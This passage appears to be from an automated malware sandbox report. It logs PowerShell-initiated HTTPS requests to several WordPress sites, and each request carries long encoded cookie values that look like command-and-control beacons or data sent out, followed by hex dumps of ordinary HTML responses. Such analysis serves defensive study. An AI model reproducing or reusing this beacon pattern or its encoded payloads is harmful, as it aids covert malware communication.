                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: thezoneheights.co.za
                                                    Connection: Close
                                                    2024-12-18 10:21:43 UTC485INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:21:40 GMT
                                                    Server: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fips
                                                    X-Powered-By: PHP/7.4.8
                                                    Link: <https://thezoneheights.co.za/wp-json/>; rel="https://api.w.org/", <https://thezoneheights.co.za/wp-json/wp/v2/pages/113>; rel="alternate"; title="JSON"; type="application/json", <https://thezoneheights.co.za/>; rel=shortlink
                                                    Vary: Accept-Encoding,User-Agent
                                                    Connection: close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:21:43 UTC7707INData Raw: 32 66 66 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 54 68 65 20 5a 6f 6e 65 20 48 65 69 67 68 74 73 20 26 23 38 32 31 31 3b 20 54 68 65 20 7a 7a 6f 6e 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61
                                                    Data Ascii: 2ff6<!doctype html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>The Zone Heights &#8211; The zzone</title><meta na
                                                    2024-12-18 10:21:44 UTC4577INData Raw: 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78
                                                    Data Ascii: 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex
                                                    2024-12-18 10:21:44 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:21:44 UTC1710INData Raw: 36 61 37 0d 0a 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d
                                                    Data Ascii: 6a7range) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--
                                                    2024-12-18 10:21:44 UTC4309INData Raw: 31 30 63 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 3f 76 65 72 3d 35 2e 37 2e 35 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a
                                                    Data Ascii: 10cd<link rel='stylesheet' id='contact-form-7-css' href='https://thezoneheights.co.za/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.5.1' media='all' /><link rel='stylesheet' id='hello-elementor-css' href='https://thezoneheights.co.z
                                                    2024-12-18 10:21:44 UTC8192INData Raw: 31 66 34 30 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 46 46 46 46 46 46 22 3e 0a 09 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 33 2f 63 72 6f 70 70 65 64 2d 6c 6f 67 6f 74 7a 68 2d 33 32 78 33 32 2e 6a 70 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 7a 6f 6e 65 68 65 69 67 68 74 73 2e 63 6f 2e 7a 61 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f
                                                    Data Ascii: 1f40<meta name="theme-color" content="#FFFFFF"><link rel="icon" href="https://thezoneheights.co.za/wp-content/uploads/2023/03/cropped-logotzh-32x32.jpg" sizes="32x32" /><link rel="icon" href="https://thezoneheights.co.za/wp-content/uploads/2023/
                                                    2024-12-18 10:21:44 UTC7817INData Raw: 2d 69 63 6f 6e 2d 6c 69 73 74 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 74 65 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 2d 6c 69 73 74 2d 69 63 6f 6e 22 3e 0a 09 09 09 09 09 09 09 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 65 2d 66 6f 6e 74 2d 69 63 6f 6e 2d 73 76 67 20 65 2d 66 61 62 2d 6c 69 6e 6b 65 64 69 6e 2d 69 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 34 38 20 35 31 32 22 20 78
                                                    Data Ascii: -icon-list-text"></span></li><li class="elementor-icon-list-item elementor-inline-item"><span class="elementor-icon-list-icon"><svg aria-hidden="true" class="e-font-icon-svg e-fab-linkedin-in" viewBox="0 0 448 512" x
                                                    2024-12-18 10:21:44 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:21:44 UTC8192INData Raw: 31 66 34 30 0d 0a 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 77 70 2d 70 61 67 65 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 31 31 33 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 31 31 33 22 3e 0a 09 09 09 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 35 36 61 32 31 62 64 39 20 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 2d 68 65 69 67 68 74 2d 6d 69 6e 2d 68 65 69 67 68 74 20 65 6c 65 6d 65 6e 74 6f 72
                                                    Data Ascii: 1f40<div data-elementor-type="wp-page" data-elementor-id="113" class="elementor elementor-113"><section class="elementor-section elementor-top-section elementor-element elementor-element-56a21bd9 elementor-section-height-min-height elementor
                                                    2024-12-18 10:21:44 UTC7822INData Raw: 6e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 62 65 66 6f 72 65 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2d 2d 76 69 65 77 2d 6c 69 6e 65 5f 74 65 78 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 61 66 74 65 72 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 64 69 76 69 64 65 72 2d 2d 76 69 65 77 2d 6c 69 6e 65 5f 74 65 78 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 64 69 76 69 64 65 72 2d 73 65 70 61 72 61 74 6f 72 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 3b 62 6f 72 64 65 72 2d 74 6f
                                                    Data Ascii: n .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:"";border-bottom:0;flex-grow:1;border-to


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.11.2049738172.105.162.74438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:21:53 UTC2259OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: acceleratedigital.com.au
                                                    Connection: Close
                                                    2024-12-18 10:21:55 UTC489INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:21:52 GMT
                                                    Server: Apache
                                                    X-Pingback: https://acceleratedigital.com.au/xmlrpc.php
                                                    Link: <https://acceleratedigital.com.au/wp-json/>; rel="https://api.w.org/", <https://acceleratedigital.com.au/wp-json/wp/v2/pages/14378>; rel="alternate"; title="JSON"; type="application/json", <https://acceleratedigital.com.au/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:21:55 UTC7703INData Raw: 31 0d 0a 09 0d 0a 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 0a 09 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 63 63 65 6c 65 72 61 74 65 20 44 69 67 69 74 61 6c
                                                    Data Ascii: 12000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"> <meta name="description" content="Accelerate Digital
                                                    2024-12-18 10:21:55 UTC501INData Raw: 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32
                                                    Data Ascii: radient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--2
                                                    2024-12-18 10:21:55 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:21:55 UTC8192INData Raw: 32 30 30 30 0d 0a 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c
                                                    Data Ascii: 2000: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0,
                                                    2024-12-18 10:21:55 UTC6INData Raw: 61 6c 2e 63 6f 6d
                                                    Data Ascii: al.com
                                                    2024-12-18 10:21:55 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:21:55 UTC8192INData Raw: 32 30 30 30 0d 0a 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 72 69 64 67 65 2f 63 73 73 2f 65 6c 65 67 61 6e 74 2d 69 63 6f 6e 73 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 36 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 62 72 69 64 67 65 2d 71 6f 64 65 2d 6c 69 6e 65 61 5f 69 63 6f 6e 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69 74 61 6c 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 72 69 64 67 65 2f 63 73 73 2f 6c 69 6e 65 61 2d 69 63 6f 6e 73 2f 73 74 79 6c 65 2e 63 73 73 3f
                                                    Data Ascii: 2000.au/wp-content/themes/bridge/css/elegant-icons/style.min.css?ver=6.6.2' type='text/css' media='all' /><link rel='stylesheet' id='bridge-qode-linea_icons-css' href='https://acceleratedigital.com.au/wp-content/themes/bridge/css/linea-icons/style.css?
                                                    2024-12-18 10:21:55 UTC6INData Raw: 2e 34 2e 38 22 20
                                                    Data Ascii: .4.8"
                                                    2024-12-18 10:21:55 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:21:55 UTC8192INData Raw: 32 30 30 30 0d 0a 69 64 3d 22 74 70 2d 74 6f 6f 6c 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69 74 61 6c 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 72 73 36 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 31 31 22 20 69 64 3d 22 72 65 76 6d 69 6e 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69
                                                    Data Ascii: 2000id="tp-tools-js"></script><script type="text/javascript" src="https://acceleratedigital.com.au/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.4.11" id="revmin-js"></script><link rel="https://api.w.org/" href="https://acceleratedigi


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.11.2049739104.21.10.2244431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:22:06 UTC2246OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: alseraj.net
                                                    Connection: Close
                                                    2024-12-18 10:22:07 UTC834INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:22:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Wed, 18 Dec 2024 09:38:26 GMT
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6PU4qY1bp3d9L8%2FvNnKnwYDJiD4mPEf%2FwHv2UtiEQauc6RHMlq3OpY1Z6kZpoqmTu6QYEwdAn2VcNJsfsVu8S51Rf0uJHYdUYhLJNqRWFsl5PJQpNbSweY6oJHTIkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e6e0b6811afb6-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141126&min_rtt=140965&rtt_var=30003&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2865&delivery_rate=27045&cwnd=252&unsent_bytes=0&cid=0a9d7269ec998047&ts=838&x=0"
